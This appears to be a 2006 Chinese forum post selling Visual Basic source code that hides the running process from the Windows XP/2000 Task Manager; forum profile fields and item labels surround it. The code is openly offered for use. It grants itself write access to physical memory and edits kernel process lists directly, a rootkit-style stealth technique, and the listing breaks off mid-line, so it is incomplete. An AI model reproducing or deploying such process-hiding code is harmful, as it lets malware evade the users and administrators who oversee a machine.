- 注册时间
- 2006-6-1
- 最后登录
- 2012-5-20
- 阅读权限
- 255
- 积分
- 3161
- 精华
- 0
- 帖子
- 3161
- 性别
- 男
- 听众数
- 15
- 买家信用
 - 卖家信用
- 在线时间
- 1426 小时
- 相册
- 0
|
发表于 2006-8-31 10:10:00
|显示全部楼层
|
[sell=500]<br>源码如下:<br>'模块名称:modHideProcess.bas<br>'<br>'模块功能:在 XP/2K 任务管理器的进程列表中隐藏当前进程<br>'<br>'使用方法:直接调用 HideCurrentProcess()<br>'---------------------------------------------------------------------------------------<br><br>Option Explicit<br><br>Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004<br>Private Const STATUS_ACCESS_DENIED = &HC0000022<br>Private Const STATUS_INVALID_HandLE = &HC0000008<br>Private Const ERROR_SUCCESS = 0&<br>Private Const SECTION_MAP_WRITE = &H2<br>Private Const SECTION_MAP_READ = &H4<br>Private Const READ_CONTROL = &H20000<br>Private Const WRITE_DAC = &H40000<br>Private Const NO_INHERITANCE = 0<br>Private Const DACL_SECURITY_INFORMATION = &H4<br><br>Private Type IO_STATUS_BLOCK<br> Status As Long<br> Information As Long<br>End Type<br><br>Private Type UNICODE_STRING<br> Length As Integer<br> MaximumLength As Integer<br> Buffer As Long<br>End Type<br><br>Private Const OBJ_INHERIT = &H2<br>Private Const OBJ_PERMANENT = &H10<br>Private Const OBJ_EXCLUSIVE = &H20<br>Private Const OBJ_CASE_INSENSITIVE = &H40<br>Private Const OBJ_OPENIF = &H80<br>Private Const OBJ_OPENLINK = &H100<br>Private Const OBJ_KERNEL_HandLE = &H200<br>Private Const OBJ_VALID_ATTRIBUTES = &H3F2<br><br>Private Type OBJECT_ATTRIBUTES<br> Length As Long<br> RootDirectory As Long<br> ObjectName As Long<br> Attributes As Long<br> SecurityDeor As Long<br> SecurityQualityOfService As Long<br>End Type<br><br>Private Type ACL<br> AclRevision As Byte<br> Sbz1 As Byte<br> AclSize As Integer<br> AceCount As Integer<br> Sbz2 As Integer<br>End Type<br><br>Private Enum ACCESS_MODE<br> NOT_USED_ACCESS<br> GRANT_ACCESS<br> SET_ACCESS<br> DENY_ACCESS<br> REVOKE_ACCESS<br> SET_AUDIT_SUCCESS<br> SET_AUDIT_FAILURE<br>End Enum<br><br>Private Enum MULTIPLE_TRUSTEE_OPERATION<br> NO_MULTIPLE_TRUSTEE<br> TRUSTEE_IS_IMPERSONATE<br>End Enum<br><br>Private Enum TRUSTEE_FORM<br> TRUSTEE_IS_SID<br> TRUSTEE_IS_NAME<br>End Enum<br><br>Private Enum TRUSTEE_TYPE<br> TRUSTEE_IS_UNKNOWN<br> TRUSTEE_IS_USER<br> TRUSTEE_IS_GROUP<br>End Enum<br><br>Private Type TRUSTEE<br> pMultipleTrustee As Long<br> MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION<br> TrusteeForm As TRUSTEE_FORM<br> TrusteeType As TRUSTEE_TYPE<br> ptstrName As String<br>End Type<br><br>Private Type EXPLICIT_ACCESS<br> grfAccessPermissions As Long<br> grfAccessMode As ACCESS_MODE<br> grfInheritance As Long<br> TRUSTEE As TRUSTEE<br>End Type<br><br>Private Type AceArray<br> List() As EXPLICIT_ACCESS<br>End Type<br><br>Private Enum SE_OBJECT_TYPE<br> SE_UNKNOWN_OBJECT_TYPE = 0<br> SE_FILE_OBJECT<br> SE_SERVICE<br> SE_PRINTER<br> SE_REGISTRY_KEY<br> SE_LMSHARE<br> SE_KERNEL_OBJECT<br> SE_WINDOW_OBJECT<br> SE_DS_OBJECT<br> SE_DS_OBJECT_ALL<br> SE_PROVIDER_DEFINED_OBJECT<br> SE_WMIGUID_OBJECT<br>End Enum<br><br>Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, <br><br>ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As <br><br>Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long<br>Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, <br><br>ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As <br><br>Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As <br><br>Long<br> <br>Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias <br><br>"SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries <br><br>As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long<br>Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias <br><br>"BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal <br><br>pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As <br><br>ACCESS_MODE, ByVal Inheritance As Long)<br> <br>Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As <br><br>UNICODE_STRING, ByVal SourceString As Long)<br>Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, <br><br>ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long<br>Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long<br>Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As <br><br>Long<br>Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As <br><br>Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal <br><br>dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long<br>Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As <br><br>Long<br>Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination <br><br>As Any, Source As Any, ByVal Length As Long)<br>Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" <br><br>(LpVersionInformation As OSVERSIONINFO) As Long<br><br>Private Type OSVERSIONINFO<br> dwOSVersionInfoSize As Long<br> dwMajorVersion As Long<br> dwMinorVersion As Long<br> dwBuildNumber As Long<br> dwPlatformId As Long<br> szCSDVersion As String * 128<br>End Type<br> <br>Private verinfo As OSVERSIONINFO<br> <br>Private g_hNtDLL As Long<br>Private g_pMapPhysicalMemory As Long<br>Private g_hMPM As Long<br>Private aByte(3) As Byte<br><br>Public Sub HideCurrentProcess()<br>'在进程列表中隐藏当前应用程序进程<br><br> Dim thread As Long, process As Long, fw As Long, bw As Long<br> Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long<br> <br> verinfo.dwOSVersionInfoSize = Len(verinfo)<br> If (GetVersionEx(verinfo)) <> 0 Then<br> If verinfo.dwPlatformId = 2 Then<br> If verinfo.dwMajorVersion = 5 Then<br> select Case verinfo.dwMinorVersion<br> Case 0<br> lOffsetFlink = &HA0<br> lOffsetBlink = &HA4<br> lOffsetPID = &H9C<br> Case 1<br> lOffsetFlink = &H88<br> lOffsetBlink = &H8C<br> lOffsetPID = &H84<br> End select<br> End If<br> End If<br> End If<br><br> If OpenPhysicalMemory <> 0 Then<br> thread = GetData(&HFFDFF124)<br> process = GetData(thread + &H44)<br> fw = GetData(process + lOffsetFlink)<br> bw = GetData(process + lOffsetBlink)<br> SetData fw + 4, bw<br> SetData bw, fw<br> CloseHandle g_hMPM<br> End If<br>End Sub<br><br>Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)<br> Dim pDacl As Long<br> Dim pNewDacl As Long<br> Dim pSD As Long<br> Dim dwRes As Long<br> Dim ea As EXPLICIT_ACCESS<br> <br> GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, <br><br>pDacl, 0, pSD<br> <br> ea.grfAccessPermissions = SECTION_MAP_WRITE<br> ea.grfAccessMode = GRANT_ACCESS<br> ea.grfInheritance = NO_INHERITANCE<br> ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME<br> ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER<br> ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar<br><br> SetEntriesInAcl 1, ea, pDacl, pNewDacl<br> <br> SetSecurit |
|
/1 
窥视卡
雷达卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
发表于 2007-10-31 23:05:00
